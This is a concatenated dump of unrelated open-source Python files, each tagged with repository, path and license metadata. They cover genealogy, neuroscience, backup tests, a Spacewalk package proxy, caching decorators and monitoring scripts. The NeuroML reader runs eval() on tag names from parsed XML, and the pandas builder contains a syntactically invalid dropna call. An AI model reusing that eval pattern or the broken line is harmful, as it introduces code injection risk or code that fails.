self.stop_year.set_value(self.date.get_stop_year())
|
arunkgupta/gramps
|
gramps/gui/editors/editdate.py
|
Python
|
gpl-2.0
| 13,619
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
sql_template0 = """alter table _shadow_orders_{0}_ modify fingerprint text DEFAULT '' COMMENT '下单fingerprint';"""
if __name__ == '__main__':
for index in range(0, 50):
print(sql_template0.format(index))
print("------")
for index in range(50, 100):
print(sql_template0.format(index))
|
yaolei313/python-study
|
base/test.py
|
Python
|
gpl-2.0
| 365
|
try:
from xml.etree import cElementTree as etree
except ImportError:
from xml.etree import ElementTree as etree
import xml2nrn
# module names derived from the namespace. Add new tags in proper namespace
import neuroml
import metadata
import morphml
import biophysics
class FileWrapper:
def __init__(self, source):
self.source = source
self.lineno = 0
def read(self, bytes):
s = self.source.readline()
self.lineno += 1
return s
# for each '{namespace}element' call the corresponding module.func
def handle(x2n, fw, event, node):
tag = node.tag.split('}')
# hopefully a namespace token corresponding to an imported module name
ns = tag[0].split('/')[-2]
tag = ns+'.'+tag[1] #namespace.element should correspond to module.func
f = None
try:
if event == 'start':
f = eval(tag)
elif event == 'end':
f = eval(tag + '_end')
except:
pass
if f:
x2n.locator.lineno = fw.lineno
try:
f(x2n, node) # handle the element when it opens
except:
print tag,' failed at ', x2n.locator.getLineNumber()
elif event == 'start':
print 'ignore', node.tag # no function to handle the element
return 0
return 1
def rdxml(fname, ho = None):
f = FileWrapper(open(fname))
x2n = xml2nrn.XML2Nrn()
ig = None
for event, elem in etree.iterparse(f, events=("start", "end")):
if ig != elem:
if handle(x2n, f, event, elem) == 0:
ig = elem
if (ho):
ho.parsed(x2n)
if __name__ == '__main__':
rdxml('temp.xml')
|
neurodebian/pkg-neuron
|
share/lib/python/neuron/neuroml/rdxml.py
|
Python
|
gpl-2.0
| 1,545
|
#! /usr/bin/python
# vim: set fileencoding=utf-8 sw=4 ts=4 et:
import rrdtool, os
from def_rrds import rrds
import def_metrics
from def_metrics import metrics
for m in metrics:
if isinstance(metrics[m]['rrd'], list):
# multiples rrds
for i,f in enumerate(metrics[m]['rrd']):
if not os.path.isfile(f):
rrdtool.create(f, rrds[m][i])
else:
if not os.path.isfile(metrics[m]['rrd']):
rrdtool.create(metrics[m]['rrd'], rrds[m])
values = getattr(def_metrics, '_get_'+m)()
#print(m, repr(values))
if isinstance(metrics[m]['rrd'], list):
# multiples rrds
for i,f in enumerate(metrics[m]['rrd']):
rrdtool.update(f, 'N:'+':'.join(values[i]))
else:
if isinstance(values, str):
rrdtool.update(metrics[m]['rrd'], 'N:%s' % values)
else: # tuple
rrdtool.update(metrics[m]['rrd'], 'N:'+':'.join(values))
|
albatros69/monit-pi
|
monit/monit.py
|
Python
|
gpl-2.0
| 946
|
# Back In Time
# Copyright (C) 2008-2017 Oprea Dan, Bart de Koning, Richard Bailey, Germar Reitze
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation,Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os
import sys
import unittest
import pwd
import grp
import stat
from tempfile import TemporaryDirectory
from test import generic
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import config
import snapshots
import mount
CURRENTUID = os.geteuid()
CURRENTUSER = pwd.getpwuid(CURRENTUID).pw_name
CURRENTGID = os.getegid()
CURRENTGROUP = grp.getgrgid(CURRENTGID).gr_name
class RestoreTestCase(generic.SnapshotsWithSidTestCase):
def setUp(self):
super(RestoreTestCase, self).setUp()
self.include = TemporaryDirectory()
generic.create_test_files(self.sid.pathBackup(self.include.name))
def tearDown(self):
super(RestoreTestCase, self).tearDown()
self.include.cleanup()
def prepairFileInfo(self, restoreFile, mode = 33260):
d = self.sid.fileInfo
d[restoreFile.encode('utf-8', 'replace')] = (mode,
CURRENTUSER.encode('utf-8', 'replace'),
CURRENTGROUP.encode('utf-8', 'replace'))
self.sid.fileInfo = d
class TestRestore(RestoreTestCase):
def test_restore_multiple_files(self):
restoreFile1 = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile1)
restoreFile2 = os.path.join(self.include.name, 'foo', 'bar', 'baz')
self.prepairFileInfo(restoreFile2)
self.sn.restore(self.sid, (restoreFile1, restoreFile2))
self.assertIsFile(restoreFile1)
with open(restoreFile1, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(restoreFile1).st_mode)
self.assertIsFile(restoreFile2)
with open(restoreFile2, 'rt') as f:
self.assertEqual(f.read(), 'foo')
self.assertEqual(33260, os.stat(restoreFile2).st_mode)
def test_restore_to_different_destination(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with TemporaryDirectory() as dest:
destRestoreFile = os.path.join(dest, 'test')
self.sn.restore(self.sid, restoreFile, restore_to = dest)
self.assertIsFile(destRestoreFile)
with open(destRestoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(destRestoreFile).st_mode)
def test_restore_folder_to_different_destination(self):
restoreFolder = self.include.name
self.prepairFileInfo(restoreFolder)
self.prepairFileInfo(os.path.join(restoreFolder, 'test'))
self.prepairFileInfo(os.path.join(restoreFolder, 'file with spaces'))
with TemporaryDirectory() as dest:
destRestoreFile = os.path.join(dest, os.path.basename(restoreFolder), 'test')
self.sn.restore(self.sid, restoreFolder, restore_to = dest)
self.assertIsFile(destRestoreFile)
with open(destRestoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(destRestoreFile).st_mode)
def test_delete(self):
restoreFolder = self.include.name
junkFolder = os.path.join(self.include.name, 'junk')
os.makedirs(junkFolder)
self.assertExists(junkFolder)
self.prepairFileInfo(restoreFolder)
self.sn.restore(self.sid, restoreFolder, delete = True)
self.assertIsFile(restoreFolder, 'test')
self.assertNotExists(junkFolder)
def test_backup(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with open(restoreFile, 'wt') as f:
f.write('fooooooooooooooooooo')
self.sn.restore(self.sid, restoreFile, backup = True)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
backupFile = restoreFile + self.sn.backupSuffix()
self.assertIsFile(backupFile)
with open(backupFile, 'rt') as f:
self.assertEqual(f.read(), 'fooooooooooooooooooo')
def test_no_backup(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with open(restoreFile, 'wt') as f:
f.write('fooooooooooooooooooo')
self.sn.restore(self.sid, restoreFile, backup = False)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
backupFile = restoreFile + self.sn.backupSuffix()
self.assertIsNoFile(backupFile)
def test_only_new(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with open(restoreFile, 'wt') as f:
f.write('fooooooooooooooooooo')
# change mtime to be newer than the one in snapshot
st = os.stat(restoreFile)
atime = st[stat.ST_ATIME]
mtime = st[stat.ST_MTIME]
new_mtime = mtime + 3600
os.utime(restoreFile, (atime, new_mtime))
self.sn.restore(self.sid, restoreFile, only_new = True)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'fooooooooooooooooooo')
class TestRestoreLocal(RestoreTestCase):
"""
Tests which should run on local and ssh profile
"""
def test_restore(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
self.sn.restore(self.sid, restoreFile)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(restoreFile).st_mode)
def test_restore_file_with_spaces(self):
restoreFile = os.path.join(self.include.name, 'file with spaces')
self.prepairFileInfo(restoreFile)
self.sn.restore(self.sid, restoreFile)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'asdf')
self.assertEqual(33260, os.stat(restoreFile).st_mode)
@unittest.skipIf(not generic.LOCAL_SSH, 'Skip as this test requires a local ssh server, public and private keys installed')
class TestRestoreSSH(generic.SSHSnapshotsWithSidTestCase, TestRestoreLocal):
def setUp(self):
super(TestRestoreSSH, self).setUp()
self.include = TemporaryDirectory()
generic.create_test_files(os.path.join(self.remoteSIDBackupPath, self.include.name[1:]))
#mount
self.cfg.setCurrentHashId(mount.Mount(cfg = self.cfg).mount())
def tearDown(self):
#unmount
mount.Mount(cfg = self.cfg).umount(self.cfg.current_hash_id)
super(TestRestoreSSH, self).tearDown()
self.include.cleanup()
|
mgerstner/backintime
|
common/test/test_restore.py
|
Python
|
gpl-2.0
| 7,692
|
# rhnRepository.py - Perform local repository functions.
#-------------------------------------------------------------------------------
# This module contains the functionality for providing local packages.
#
# Copyright (c) 2008--2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#-------------------------------------------------------------------------------
## language imports
import os
import time
import glob
import cPickle
import sys
import types
from operator import truth
import xmlrpclib
## common imports
from spacewalk.common.rhnLib import parseRPMName
from spacewalk.common.rhnLog import log_debug, log_error
from spacewalk.common.rhnException import rhnFault
from spacewalk.common.rhnConfig import CFG
from spacewalk.common import rhnRepository
from spacewalk.common.rhnTranslate import _
## local imports
from rhn import rpclib
PKG_LIST_DIR = os.path.join(CFG.PKG_DIR, 'list')
PREFIX = "rhn"
class NotLocalError(Exception):
pass
class Repository(rhnRepository.Repository):
# pylint: disable=R0902
""" Proxy local package repository lookup and manipulation code. """
def __init__(self,
channelName, channelVersion, clientInfo,
rhnParent=None, rhnParentXMLRPC=None, httpProxy=None, httpProxyUsername=None,
httpProxyPassword=None, caChain=None):
log_debug(3, channelName)
rhnRepository.Repository.__init__(self, channelName)
self.functions = CFG.PROXY_LOCAL_FLIST
self.channelName = channelName
self.channelVersion = channelVersion
self.clientInfo = clientInfo
self.rhnParent = rhnParent
self.rhnParentXMLRPC = rhnParentXMLRPC
self.httpProxy = httpProxy
self.httpProxyUsername = httpProxyUsername
self.httpProxyPassword = httpProxyPassword
self.caChain = caChain
def getPackagePath(self, pkgFilename, redirect=0):
""" OVERLOADS getPackagePath in common/rhnRepository.
Returns complete path to an RPM file.
"""
log_debug(3, pkgFilename)
mappingName = "package_mapping:%s:" % self.channelName
pickledMapping = self._cacheObj(mappingName, self.channelVersion,
self.__channelPackageMapping, ())
mapping = cPickle.loads(pickledMapping)
# If the file name has parameters, it's a different kind of package.
# Determine the architecture requested so we can construct an
# appropriate filename.
if type(pkgFilename) == types.ListType:
arch = pkgFilename[3]
# Not certain if anything is needed here for Debian, but since what I've tested
# works. Leave it alone.
if isSolarisArch(arch):
pkgFilename = "%s-%s-%s.%s.pkg" % \
(pkgFilename[0],
pkgFilename[1],
pkgFilename[2],
pkgFilename[3])
if not mapping.has_key(pkgFilename):
log_error("Package not in mapping: %s" % pkgFilename)
raise rhnFault(17, _("Invalid RPM package requested: %s")
% pkgFilename)
# A list of possible file paths. Always a list, channel mappings are
# cleared on package upgrade so we don't have to worry about the old
# behavior of returning a string
filePaths = mapping[pkgFilename]
# Can we see a file at any of the possible filepaths?
for filePath in filePaths:
filePath = "%s/%s" % (CFG.PKG_DIR, filePath)
log_debug(4, "File path", filePath)
if os.access(filePath, os.R_OK):
return filePath
log_debug(4, "Package not found locally: %s" % pkgFilename)
raise NotLocalError(filePaths[0], pkgFilename)
def getSourcePackagePath(self, pkgFilename):
""" OVERLOADS getSourcePackagePath in common/rhnRepository.
snag src.rpm and nosrc.rpm from local repo, after ensuring
we are authorized to fetch it.
"""
log_debug(3, pkgFilename)
if pkgFilename[-8:] != '.src.rpm' and pkgFilename[-10:] != '.nosrc.rpm':
raise rhnFault(17, _("Invalid SRPM package requested: %s")
% pkgFilename)
# Connect to the server to get an authorization for downloading this
# package
server = rpclib.Server(self.rhnParentXMLRPC, proxy=self.httpProxy,
username=self.httpProxyUsername,
password=self.httpProxyPassword)
if self.caChain:
server.add_trusted_cert(self.caChain)
try:
retval = server.proxy.package_source_in_channel(
pkgFilename, self.channelName, self.clientInfo)
except xmlrpclib.Fault, e:
raise rhnFault(1000,
_("Error retrieving source package: %s") % str(e)), None, sys.exc_info()[2]
if not retval:
raise rhnFault(17, _("Invalid SRPM package requested: %s")
% pkgFilename)
if pkgFilename[-8:] != '.src.rpm':
# We already know the filename ends in .src.rpm
nvrea = list(parseRPMName(pkgFilename[:-8]))
nvrea.append("src")
else:
# We already know the filename ends in .nosrc.rpm
# otherwise we did not pass first if in this func
nvrea = list(parseRPMName(pkgFilename[:-10]))
nvrea.append("nosrc")
filePaths = computePackagePaths(nvrea, source=1, prepend=PREFIX)
for filePath in filePaths:
filePath = "%s/%s" % (CFG.PKG_DIR, filePath)
log_debug(4, "File path", filePath)
if os.access(filePath, os.R_OK):
return filePath
log_debug(4, "Source package not found locally: %s" % pkgFilename)
raise NotLocalError(filePaths[0], pkgFilename)
def _cacheObj(self, fileName, version, dataProducer, params=None):
""" The real workhorse for all flavors of listall
It tries to pull data out of a file; if it doesn't work,
it calls the data producer with the specified params to generate
the data, which is also cached.
Returns a string from a cache file or, if the cache file is not
there, calls dataProducer to generate the object and caches the
results
"""
log_debug(4, fileName, version, params)
fileDir = self._getPkgListDir()
filePath = "%s/%s-%s" % (fileDir, fileName, version)
if os.access(filePath, os.R_OK):
# Slurp the file
f = open(filePath, "r")
data = f.read()
f.close()
return data
# The file's not there; query the DB or whatever dataproducer used.
if params is None:
params = ()
stringObject = dataProducer(*params)
# Cache the thing
cache(stringObject, fileDir, fileName, version)
# Return the string
return stringObject
@staticmethod
def _getPkgListDir():
""" Creates and returns the directory for cached lists of packages.
Used by _cacheObj.
XXX: Problem exists here. If PKG_LIST_DIR can't be created
due to ownership... this is bad... need to fix.
"""
log_debug(3, PKG_LIST_DIR)
if not os.access(PKG_LIST_DIR, os.R_OK | os.X_OK):
os.makedirs(PKG_LIST_DIR)
return PKG_LIST_DIR
def _listPackages(self):
""" Generates a list of objects by calling the function """
server = rpclib.GETServer(self.rhnParentXMLRPC, proxy=self.httpProxy,
username=self.httpProxyUsername, password=self.httpProxyPassword,
headers=self.clientInfo)
if self.caChain:
server.add_trusted_cert(self.caChain)
return server.listAllPackagesChecksum(self.channelName,
self.channelVersion)
def __channelPackageMapping(self):
""" fetch package list on behalf of the client """
log_debug(6, self.rhnParentXMLRPC, self.httpProxy, self.httpProxyUsername, self.httpProxyPassword)
log_debug(6, self.clientInfo)
try:
packageList = self._listPackages()
except xmlrpclib.ProtocolError, e:
errcode, errmsg = rpclib.reportError(e.headers)
raise rhnFault(1000, "SpacewalkProxy error (xmlrpclib.ProtocolError): "
"errode=%s; errmsg=%s" % (errcode, errmsg)), None, sys.exc_info()[2]
# Hash the list
_hash = {}
for package in packageList:
arch = package[4]
extension = "rpm"
if isSolarisArch(arch):
extension = "pkg"
if isDebianArch(arch):
extension = "deb"
filename = "%s-%s-%s.%s.%s" % (package[0], package[1],
package[2], package[4], extension)
# if the package contains checksum info
if len(package) > 6:
filePaths = computePackagePaths(package, source=0,
prepend=PREFIX, checksum=package[7])
else:
filePaths = computePackagePaths(package, source=0,
prepend=PREFIX)
_hash[filename] = filePaths
if CFG.DEBUG > 4:
log_debug(5, "Mapping: %s[...snip snip...]%s" % (str(_hash)[:40], str(_hash)[-40:]))
return cPickle.dumps(_hash, 1)
class KickstartRepository(Repository):
""" Kickstarts always end up pointing to a channel that they're getting
rpms from. Lookup what channel that is and then just use the regular
repository """
def __init__(self, kickstart, clientInfo, rhnParent=None,
rhnParentXMLRPC=None, httpProxy=None, httpProxyUsername=None,
httpProxyPassword=None, caChain=None, orgId=None, child=None,
session=None, systemId=None):
log_debug(3, kickstart)
self.systemId = systemId
self.kickstart = kickstart
self.ks_orgId = orgId
self.ks_child = child
self.ks_session = session
# have to look up channel name and version for this kickstart
# we have no equievanet to the channel version for kickstarts,
# expire the cache after an hour
fileName = "kickstart_mapping:%s-%s-%s-%s:" % (str(kickstart),
str(orgId), str(child), str(session))
mapping = self._lookupKickstart(fileName, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
Repository.__init__(self, mapping['channel'], mapping['version'],
clientInfo, rhnParent, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
def _lookupKickstart(self, fileName, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain):
fileDir = self._getPkgListDir()
filePath = "%s/%s-1" % (fileDir, fileName)
mapping = None
if os.access(filePath, os.R_OK):
# Slurp the file
f = open(filePath, "r")
mapping = cPickle.loads(f.read())
f.close()
now = int(time.time())
if not mapping or mapping['expires'] < now:
# Can't use the normal GETServer handler because there is no client
# to auth. Instead this is something the Proxy has to be able to
# do, so read the serverid and send that up.
server = rpclib.Server(rhnParentXMLRPC, proxy=httpProxy,
username=httpProxyUsername, password=httpProxyPassword)
if caChain:
server.add_trusted_cert(caChain)
try:
response = self._getMapping(server)
mapping = {'channel': str(response['label']),
'version': str(response['last_modified']),
'expires': int(time.time()) + 3600} #1 hour from now
except Exception:
# something went wrong. Punt, we just won't serve this request
# locally
raise NotLocalError
# Cache the thing
cache(cPickle.dumps(mapping, 1), fileDir, fileName, "1")
return mapping
def _listPackages(self):
""" Generates a list of objects by calling the function"""
# Can't use the normal GETServer handler because there is no client
# to auth. Instead this is something the Proxy has to be able to do,
# so read the serverid and send that up.
server = rpclib.Server(self.rhnParentXMLRPC, proxy=self.httpProxy,
username=self.httpProxyUsername, password=self.httpProxyPassword)
if self.caChain:
server.add_trusted_cert(self.caChain)
# Versionless package listing from Server. This saves us from erroring
# unnecessarily if the channel has changed since the kickstart mapping.
# No problem, newer channel listings will work fine with kickstarts
# unless they have removed the kernel or something, in which case it's
# not supposed to work.
# Worst case scenario is that we cache listing using an older version
# than it actually is, and the next time we serve a file from the
# regular Repository it'll get replace with the same info but newer
# version in filename.
return server.proxy.listAllPackagesKickstart(self.channelName,
self.systemId)
def _getMapping(self, server):
""" Generate a hash that tells us what channel this
kickstart is looking at. We have no equivalent to channel version,
so expire the cached file after an hour."""
if self.ks_orgId:
return server.proxy.getKickstartOrgChannel(self.kickstart,
self.ks_orgId, self.systemId)
elif self.ks_session:
return server.proxy.getKickstartSessionChannel(self.kickstart,
self.ks_session, self.systemId)
elif self.ks_child:
return server.proxy.getKickstartChildChannel(self.kickstart,
self.ks_child, self.systemId)
else:
return server.proxy.getKickstartChannel(self.kickstart,
self.systemId)
class TinyUrlRepository(KickstartRepository):
# pylint: disable=W0233,W0231
""" TinyURL kickstarts have actually already made a HEAD request up to the
Satellite to to get the checksum for the rpm, however we can't just use
that data because the epoch information is not in the filename so we'd
never find files with a non-None epoch. Instead do the same thing we do
for non-tiny-urlified kickstarts and look up what channel it maps to."""
def __init__(self, tinyurl, clientInfo, rhnParent=None,
rhnParentXMLRPC=None, httpProxy=None, httpProxyUsername=None,
httpProxyPassword=None, caChain=None, systemId=None):
log_debug(3, tinyurl)
self.systemId = systemId
self.tinyurl = tinyurl
# have to look up channel name and version for this kickstart
# we have no equievanet to the channel version for kickstarts,
# expire the cache after an hour
fileName = "tinyurl_mapping:%s:" % (str(tinyurl))
mapping = self._lookupKickstart(fileName, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
Repository.__init__(self, mapping['channel'], mapping['version'],
clientInfo, rhnParent, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
def _getMapping(self, server):
return server.proxy.getTinyUrlChannel(self.tinyurl, self.systemId)
def isSolarisArch(arch):
"""
Returns true if the given arch string represents a solaris architecture.
"""
return arch.find("solaris") != -1
def isDebianArch(arch):
"""
Returns true if the given arch string represents a Debian architecture..
"""
return arch[-4:] == "-deb"
def computePackagePaths(nvrea, source=0, prepend="", checksum=None):
""" Finds the appropriate paths, prepending something if necessary """
paths = []
name = nvrea[0]
release = nvrea[2]
if source:
dirarch = 'SRPMS'
pkgarch = 'src'
else:
dirarch = pkgarch = nvrea[4]
extension = "rpm"
if isSolarisArch(pkgarch):
extension = "pkg"
if isDebianArch(pkgarch):
extension = "deb"
version = nvrea[1]
epoch = nvrea[3]
if epoch not in [None, '']:
version = str(epoch) + ':' + version
# The new prefered path template avoides collisions if packages with the
# same nevra but different checksums are uploaded. It also should be the
# same as the /var/satellite/redhat/NULL/* paths upstream.
# We can't reliably look up the checksum for source packages, so don't
# use it in the source path.
if checksum and not source:
checksum_template = prepend + "/%s/%s/%s-%s/%s/%s/%s-%s-%s.%s.%s"
checksum_template = '/'.join(filter(truth, checksum_template.split('/')))
paths.append(checksum_template % (checksum[:3], name, version, release,
dirarch, checksum, name, nvrea[1], release, pkgarch, extension))
template = prepend + "/%s/%s-%s/%s/%s-%s-%s.%s.%s"
# Sanitize the path: remove duplicated /
template = '/'.join(filter(truth, template.split('/')))
paths.append(template % (name, version, release, dirarch, name, nvrea[1],
release, pkgarch, extension))
return paths
def cache(stringObject, directory, filename, version):
""" Caches stringObject into a file and removes older files """
# The directory should be readable, writable, seekable
if not os.access(directory, os.R_OK | os.W_OK | os.X_OK):
os.makedirs(directory)
filePath = "%s/%s-%s" % (directory, filename, version)
# Create a temp file based on the filename, version and stuff
tempfile = "%s-%.20f" % (filePath, time.time())
# Try to create the temp file
tries = 10
while tries > 0:
# Try to create this new file
try:
fd = os.open(tempfile, os.O_WRONLY | os.O_CREAT | os.O_EXCL,
0644)
except OSError, e:
if e.errno == 17:
# File exists; give it another try
tries = tries - 1
tempfile = tempfile + "%.20f" % time.time()
continue
# Another error
raise
else:
# We've got the file; everything's nice and dandy
break
else:
# Could not create the file
raise Exception("Could not create the file")
# Write the object into the cache
os.write(fd, stringObject)
os.close(fd)
# Now rename the temp file
os.rename(tempfile, filePath)
# Expire the cached copies
_list = glob.glob("%s/%s-*" % (directory, filename))
for _file in _list:
if _file < filePath:
# Older than this
os.unlink(_file)
|
moio/spacewalk
|
proxy/proxy/broker/rhnRepository.py
|
Python
|
gpl-2.0
| 19,738
|
import functools
class memoize(object):
def __init__ (self, func):
self.func = func
def __call__ (self, *args, **kwargs):
if (args, str(kwargs)) in self.__dict__:
value = self.__dict__[args, str(kwargs)]
else:
value = self.func(*args, **kwargs)
self.__dict__[args, str(kwargs)] = value
return value
def __repr__(self):
"""
Return the function's docstring.
"""
return self.func.__doc__ or ''
def __get__(self, obj, objtype):
"""
Support instance methods.
"""
return functools.partial(self.__call__, obj)
class cached_property(object):
"""Property descriptor that caches the return value
of the get function.
*Examples*
.. code-block:: python
@cached_property
def connection(self):
return Connection()
@connection.setter # Prepares stored value
def connection(self, value):
if value is None:
raise TypeError("Connection must be a connection")
return value
@connection.deleter
def connection(self, value):
# Additional action to do at del(self.attr)
if value is not None:
print("Connection %r deleted" % (value, ))
"""
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.__get = fget
self.__set = fset
self.__del = fdel
self.__doc__ = doc or fget.__doc__
self.__name__ = fget.__name__
self.__module__ = fget.__module__
def __get__(self, obj, type=None):
if obj is None:
return self
try:
return obj.__dict__[self.__name__]
except KeyError:
value = obj.__dict__[self.__name__] = self.__get(obj)
return value
def __set__(self, obj, value):
if obj is None:
return self
if self.__set is not None:
value = self.__set(obj, value)
obj.__dict__[self.__name__] = value
def __delete__(self, obj):
if obj is None:
return self
try:
value = obj.__dict__.pop(self.__name__)
except KeyError:
pass
else:
if self.__del is not None:
self.__del(obj, value)
def setter(self, fset):
return self.__class__(self.__get, fset, self.__del)
def deleter(self, fdel):
return self.__class__(self.__get, self.__set, fdel)
|
bop/foundation
|
lib/python2.7/site-packages/compressor/utils/decorators.py
|
Python
|
gpl-2.0
| 2,549
|
from datetime import datetime
import csv
import pandas
import os
import sys
os.chdir(sys.argv[1])
ticker_f = open(sys.argv[2], "rb")
ticker_reader = csv.reader(ticker_f)
tickers = [r[0] for r in ticker_reader][1:]
ticker_f.close()
tln = len(tickers)
t_1 = datetime.now()
# build full data frame
res = None
for i, t in enumerate(tickers):
t_n = t.split("/")[1]
df = pandas.io.parsers.read_csv("%s.csv" % t_n)
df[t_n] = (df["Close"].shift(1) - df["Close"]) / df["Close"]
df = df[["Date", t_n]]
df.set_index("Date")
if res is None:
res = df
else:
res = res.merge(df, on="Date", how="outer")
print i, i * 100. / tln, datetime.now() - t_1
res = res.dropna(axis=0, int(sys.argv[3])) # drop many missing obs
res = res.dropna(axis=1, int(sys.argv[4])) # drop many missing vars
res = res.dropna()
res.to_csv(sys.argv[5])
|
lbybee/NVLDA
|
code/build_dataset.py
|
Python
|
gpl-2.0
| 865
|
# DFF -- An Open Source Digital Forensics Framework
# Copyright (C) 2009-2011 ArxSys
# This program is free software, distributed under the terms of
# the GNU General Public License Version 2. See the LICENSE file
# at the top of the source tree.
#
# See http://www.digital-forensic.org for more information about this
# project. Please do not directly contact any of the maintainers of
# DFF for assistance; the project provides a web site, mailing lists
# and IRC channels for your use.
#
# Author(s):
# Solal Jacob <sja@digital-forensic.org>
#
__dff_module_info_version__ = "1.0.0"
from api.vfs import *
from api.module.script import *
from api.loader import *
from api.module.module import *
from api.taskmanager.taskmanager import *
from api.types.libtypes import Parameter, Variant, Argument, typeId, ConfigManager
from datetime import timedelta, datetime
from ui.console.utils import VariantTreePrinter
class INFO(Script, VariantTreePrinter):
def __init__(self):
Script.__init__(self, "info")
VariantTreePrinter.__init__(self)
self.loader = loader.loader()
self.tm = TaskManager()
self.cm = ConfigManager.Get()
def show_config(self, modname):
conf = self.cm.configByName(modname)
res = "\n\tConfig:"
arguments = conf.arguments()
for argument in arguments:
res += "\n\t\tname: " + str(argument.name())
res += "\n\t\tdescription: " + str(argument.description())
if argument.inputType() == Argument.Empty:
res += "\n\t\tno input parameters"
else:
res += "\n\t\ttype: " + str(typeId.Get().typeToName(argument.type()))
res += "\n\t\trequirement: "
if argument.requirementType() == Argument.Optional:
res += "optional"
else:
res += "mandatory"
res += "\n\t\tinput parameters: "
if argument.parametersType() == Parameter.NotEditable:
res += "not editable "
else:
res += "editable "
if argument.inputType() == Argument.List:
res += "list"
else:
res += "single"
pcount = argument.parametersCount()
if pcount != 0:
parameters = argument.parameters()
res += "\n\t\tpredefined parameters: "
for parameter in parameters:
if argument.type() == typeId.Node:
res += str(parameter.value().absolute())
else:
res += parameter.toString()
pcount -= 1
if pcount != 0:
res += ", "
res += "\n"
constants = conf.constants()
if len(constants) > 0:
res += "\n\tConstant: \t"
for constant in constants:
res += "\n\t\tname: " + str(constant.name())
res += "\n\t\tdescription: " + str(constant.description())
res += "\n\t\ttype: " + str(typeId.Get().typeToName(constant.type()))
cvalues = constant.values()
cvallen = len(cvalues)
if cvallen > 0:
res += "\n\t\tvalues: "
for cvalue in cvalues:
if cvalue.type() == typeId.Node:
res += str(cvalue.value().absolute())
else:
res += cvalue.toString()
cvallen -= 1
if cvallen != 0:
res += ", "
res += "\n"
return res
def show_arg(self, args):
res = ""
if len(args):
res += "\n\n\t\tArguments: \t"
for argname in args.keys():
res += "\n\t\t\tname: " + argname
res += "\n\t\t\tparameters: "
val = args[argname]
if val.type() == typeId.List:
vlist = val.value()
vlen = len(vlist)
for item in vlist:
if item.type == typeId.Node:
res += str(val.value().absolute())
else:
res += item.toString()
vlen -= 1
if vlen != 0:
res += ", "
elif val.type() == typeId.Node:
res += str(val.value().absolute())
return res
def show_res(self, results):
res = self.fillMap(3, results, "\n\n\t\tResults:")
return res
def c_display(self):
print self.info
def getmodinfo(self, modname):
conf = self.cm.configByName(modname)
if conf == None:
return
self.lproc = self.tm.lprocessus
self.info += "\n" + modname + self.show_config(modname)
for proc in self.lproc:
if proc.mod.name == modname:
self.info += "\n\tProcessus " + str(proc.pid)
stime = datetime.fromtimestamp(proc.timestart)
self.info += "\n\t\texecution started at : " + str(stime)
if proc.timeend:
etime = datetime.fromtimestamp(proc.timeend)
self.info += "\n\t\texecution finished at : " + str(etime)
else:
etime = datetime.fromtimestamp(time.time())
delta = etime - stime
self.info += "\n\t\texecution time: " + str(delta)
self.info += self.show_arg(proc.args)
self.info += self.show_res(proc.res)
def start(self, args):
self.info = ""
if args.has_key("modules"):
modnames = args['modules'].value()
for modname in modnames:
self.getmodinfo(modname.value())
else:
self.modules = self.loader.modules
for modname in self.modules:
self.getmodinfo(modname)
class info(Module):
"""Show info on loaded drivers: configuration, arguments, results
"""
def __init__(self):
Module.__init__(self, "info", INFO)
self.tags = "builtins"
self.conf.addArgument({"name": "modules",
"description": "Display information concerning provided modules",
"input": Argument.Optional|Argument.List|typeId.String})
|
halbbob/dff
|
modules/builtins/info.py
|
Python
|
gpl-2.0
| 5,653
|
#!/usr/bin/python
# script to measure save a bunch of VNA phase measurements while stepping beam numbers
# useful for characterizing the RF path (transmitter antenna port to receiver input) and looking for time delay differences
# requires ssh key for QNX box and VNA
# jon klein, jtklein@alaska.edu, mit license
# jef spaleta
from pylab import *
from vna_control import *
from csv_utils import *
import argparse, os, time, sys
